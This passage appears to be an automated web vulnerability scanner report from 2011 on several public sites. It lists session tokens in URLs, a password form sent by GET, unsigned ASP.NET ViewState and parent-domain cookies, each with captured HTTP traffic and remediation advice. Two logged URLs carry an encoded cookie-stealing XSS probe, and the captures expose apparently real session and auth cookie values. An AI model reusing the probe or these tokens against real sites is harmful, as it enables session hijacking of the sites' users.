/extern/login_status.php ?api_key=8e6a1a98056 aa9ca18b3ce59e4ec2fb4&app _id=8e6a1a98056aa9ca 18b3ce59e4ec2fb4&display =hidden&extern=2&locale =en_US&method=auth.status &next=http%3A%2F%2Fstatic .ak.fbcdn.net%2Fconnect %2Fxd_proxy.php%23cb %3Df3b015eec4%26origin %3Dhttp%253A%252F%252Fwww .pogo.com%252Ff3c647ad18 %26relation%3Dopener %26transport%3Dpostm essage%26frame%3Df36 25f2e24%26result%3D %2522xxRESULTTOKENxx%2522 &no_session=http%3A%2F %2Fstatic.ak.fbcdn.net %2Fconnect%2Fxd_proxy.php %23cb%3Df138cd7e08 %26origin%3Dhttp%253A %252F%252Fwww.pogo.com %252Ff3c647ad18 %26relation%3Dparent %26transport%3Dpostm essage%26frame%3Df36 25f2e24&no_user=http%3A %2F%2Fstatic.ak.fbcdn.net %2Fconnect%2Fxd_proxy.php %23cb%3Dff465dc08 %26origin%3Dhttp%253A %252F%252Fwww.pogo.com %252Ff3c647ad18 %26relation%3Dparent %26transport%3Dpostm essage%26frame%3Df36 25f2e24&ok_session=http %3A%2F%2Fstatic.ak.fbcdn .net%2Fconnect%2Fxd_proxy .php%23cb%3Df12d7b018c %26origin%3Dhttp%253A %252F%252Fwww.pogo.com %252Ff3c647ad18 %26relation%3Dparent %26transport%3Dpostm essage%26frame%3Df36 25f2e24&sdk=joey&session _version=3
Request
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Location: http://static.ak.fbcdn Content-Type: text/html; charset=utf-8 X-Cnection: close Date: Sun, 09 Jan 2011 01:25:12 GMT Content-Length: 0 |
6.2. http://www.pogo.com/account/my-account/main.do previous next
Summary
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.pogo.com |
Path: | /account/my-account/main |
Issue detail
The response contains the following links that appear to contain session tokens:- https://checkout.pogo.com
/lockbox-ui/manageac counts/showAccounts ?encryptedToken=9xvOPkA -igVLGPFxOWBmhVS3npb We2NXkZsueF0qw-Hmkc6 sATMqxK_iiAb8qiQcVXn Mfyp2i5vKQuBLnyoDUGp X5GCBuMK_3Ov29oVhDQQ I2ipFS_IydUVPngZ8z04 7lJreOxhzZkwyUxn6p _7GmLcPKtz2XKHIZaqxv shiHYxqe9rCMPOvze6BC BRPJXVJ4fguurJaEEAQW FE9kRnxKwSEP78v0mNKJ XGzoZHwSFtbgDBBDiVGp MOpqAYvJgRFO78YstISG xddQeNIH9V_6tuGbor2tg _jGpw0JWIhen0.&lang=en_US &returnUrl=http%3A%2F %2Fwww.pogo.com%2Fmisc %2Freturn.do%3FreturnType %3DmyAccount
Request
GET /account/my-account/main Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US text/html: encoding=UTF-8 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:28:07 GMT Server: Apache-Coyote/1.1 Content-Length: 24064 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <a href="https://checkout ...[SNIP]... |
6.3. http://www.slidedeck.com/ previous next
Summary
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.slidedeck.com |
Path: | / |
Issue detail
The response contains the following links that appear to contain session tokens:- http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Ffeeds .feedburner.com %2FTechCrunch&skin=light &navigation=simple-dots& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Frss1 .smashingmagazine.com %2Ffeed%2F&_wpnonce =695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Frss1 .smashingmagazine.com %2Ffeed%2F&skin=light &navigation=simple-dots& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Fwww .dtelepathy.com%2Fblog %2Ffeed&skin=dark &navigation=simple-dots& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Fwww .dtelepathy.com%2Fblog %2Ffeed&skin=light &navigation=dates& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Fwww .dtelepathy.com%2Fblog %2Ffeed&skin=light &navigation=post-titles& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Fwww .dtelepathy.com%2Fblog %2Ffeed&skin=light &navigation=simple-dots& _wpnonce=695cf3a777 - http://www.slidedeck.com
/wp-admin/admin-ajax.php ?action=usdd_show&url =http%3A%2F%2Fwww .engadget.com%2Frss.xml &skin=light&navigation =simple-dots&_wpnonce =695cf3a777
Request
GET / HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:07:02 GMT Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46540 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <p><a href="http://www ...[SNIP]... </h5> <a href="http://www <a href="http://www <a href="http://www ...[SNIP]... </h5> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </h5> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... |
7. Password field submitted using GET method previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rockband.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:- http://www.rockband.com/
- password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... <div id="sign_in_form <form> username: <input type="text" name="username" id="username" /> password: <input type="password" name="password" id="password" /> remember me: <input type="checkbox" name="remember" id="remember" value="true" /> ...[SNIP]... |
8. ASP.NET ViewState without MAC enabled previous next
There are 2 instances of this issue:
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.8.1. http://beta-ads.ace.advertising.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://beta-ads.ace |
Path: | / |
Request
GET / HTTP/1.1 Host: beta-ads.ace.advertising Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 09 Jan 2011 02:03:43 GMT Content-Length: 1402 Connection: close Set-Cookie: A07L=CT; expires=Sun, 06-Feb-2011 02:03:43 GMT; path=/; domain=beta-ads.ace P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Ad ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" /> ...[SNIP]... |
8.2. http://r1.ace.advertising.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | / |
Request
GET / HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:25:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1390 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Ad ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" /> ...[SNIP]... |
9. Cookie scoped to parent domain previous next
There are 71 instances of this issue:
- http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://www.43things.com/person/
- http://www.freshnews.com/news/388192/peanut-labs
-inc-announces-acqui sition-e-rewards-inc- - http://www.peanutlabs.com/peanutlabs/
- http://www.peanutlabs.com/userGreeting.php
- http://ad.doubleclick.net/click
- http://ad.turn.com/server/pixel.htm
- http://admeld.adnxs.com/usersync
- http://ads.adxpose.com/ads/ads.js
- http://altfarm.mediaplex.com/ad/js/55290
- http://b.scorecardresearch.com/b
- http://b.scorecardresearch.com/p
- http://b.scorecardresearch.com/r
- http://board-games.pogo.com/
- http://board-games.pogo.com/games/monopoly
- http://board-games.pogo.com/games/online-chess
- http://board-games.pogo.com/games/risk
- http://bs.serving-sys.com/BurstingPipe/Banner
Source.asp - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp - http://bs.serving-sys.com/BurstingPipe/adServer.bs
- http://card-games.pogo.com/
- http://card-games.pogo.com/games/cribbage
- http://card-games.pogo.com/games/rainy-day-spider
-solitaire - http://click.linksynergy.com/fs-bin/stat
- http://clubpogo-games.pogo.com/
- http://flash-games.pogo.com/
- http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
- http://puzzle-games.pogo.com/
- http://puzzle-games.pogo.com/games/bejeweled2
- http://puzzle-games.pogo.com/games/yahtzee-party
- http://r.turn.com/server/pixel.htm
- http://r1.ace.advertising.com/click/site=0000758630
/mnum=0000906164/cstr =52607936=_4d290f90 ,0846642328,758630^906164 ^1^0,1_/xsxdata=$xsxdata /bnum=52607936/optn=64 - http://r1.ace.advertising.com/site=755399/size=300250
/u=2/bnum=72318651/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=2/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F %253Fdb83d%2527-alert %2528document.cookie%2529 -%2527e027fe9bbf5%253D1 - http://r1.ace.advertising.com/site=758630/size=160600
/u=2/bnum=52607936/hr=19 /hl=3/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.pogo.com %252Fgames%252Fscrabble %253FpageSection%253Dfree _home_hot_games1_pl _scrabble - http://r1.ace.advertising.com/site=777340/size=300600
/u=2/bnum=17871065/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F - http://r1.ace.advertising.com/site=777340/size=300600
/u=2/bnum=49979532/hr=19 /hl=2/c=3/scres=5/swh =1920x1200/tile=1/f=0/r=1 /optn=1/fv=10/aolexp=1 /dref=http%253A%252F %252Fwww.mlive.com%252F %253Fdb83d%2527-alert %2528document.cookie%2529 -%2527e027fe9bbf5%253D1 - http://www.adobe.com/cfusion/exchange/
- http://www.adobe.com/cfusion/marketplace
/index.cfm - http://www.adobe.com/cfusion/membership/index
.cfm - http://www.adobe.com/cfusion/membership
/logout.cfm - http://www.adobe.com/cfusion/partnerportal
/index.cfm - http://www.adobe.com/cfusion/showcase/index
.cfm - http://www.adobe.com/cfusion/store/html/index
.cfm - http://www.adobe.com/cfusion/support/index
.cfm - http://www.adobe.com/events/main.jsp
- http://www.bbc.co.uk/news/technology-12126880
- http://www.e00.peanutlabs.com/js/iFrame/index.php
- http://www.facebook.com/
- http://www.facebook.com/2008/fbml
- http://www.facebook.com/Pogo
- http://www.facebook.com/campaign/impression.php
- http://www.facebook.com/campaign/landing.php
- http://www.facebook.com/event.php
- http://www.facebook.com/logout.php
- http://www.facebook.com/pages/Packet-Storm
-Security/116613458352817 - http://www.facebook.com/peanutlabs
- http://www.facebook.com/sitetour/connect.php
- https://www.facebook.com/login.php
- http://www.gamespot.com/
- http://www.peanutlabs.com/core.php
- http://www.peanutlabs.com/pl/profileSurveyRegister
.php - http://www.peanutlabs.com/publisher/dashboard2
/PublisherDashboard.php - http://www.pogo.com/action/pogo/lightreg.do
- http://www.pogo.com/games/connect.jsp
- http://www.pogo.com/games/scrabble
- http://www.pogo.com/login/entry.jsp
- http://www.pogo.com/login/pogo/setCookie.do
- https://www.pogo.com/fbconnect/js.do
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.9.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
- djcs_route=aa545813-1265
-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 - DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
- wsjregion=na%2cus; path=/; domain=.wsj.com
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.2. http://www.43things.com/person/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.43things.com |
Path: | /person/ |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- _session_id=c7e240c8
34b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ - ubid=ShCp%2FqO8Bd
%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT - auth=Zaocciefe2iud12
Jq25sodTcu2vit7TjegQ eSYLGVdilfdfNS7JNv0g ado1gfauX2reopc1qxAe qCAoyKTVvomHrTkdZTDb 6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd Set-Cookie: auth=Zaocciefe2iud12 Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c8 Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>43 Things</title> <m ...[SNIP]... |
9.3. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.freshnews.com |
Path: | /news/388192/peanut-labs |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- SESSdcb5af41d343fdd7
86908e4442f98f39 =dpp7pp1blldcdp337o1 5850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com
Request
GET /news/388192/peanut-labs Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:18:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 Set-Cookie: SESSdcb5af41d343fdd7 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 05:18:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20877 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
9.4. http://www.peanutlabs.com/peanutlabs/ previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.peanutlabs.com |
Path: | /peanutlabs/ |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- SESSef469ce213eb8a40
5bbf25673950acca =0obr3bvubl5fq0qq2jj 04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com
Request
GET /peanutlabs/ HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 01:35:19 GMT Server: Apache Set-Cookie: SESSef469ce213eb8a40 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 01:35:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Location: http://www1.peanutlabs Vary: Accept-Encoding,User Content-Type: text/html; charset=utf-8 Content-Length: 0 |
9.5. http://www.peanutlabs.com/userGreeting.php previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.peanutlabs.com |
Path: | /userGreeting.php |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- PHPSESSID=no34gl7itt
r6r2j8nkt40st7q5; path=/; domain=.peanutlabs.com - pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com - ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
- sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com - pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
- pl_email=test4%40fastdial
.net; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
Request
GET /userGreeting.php?userId Host: www.peanutlabs.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:16 GMT Server: Apache Set-Cookie: PHPSESSID=no34gl7itt Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; 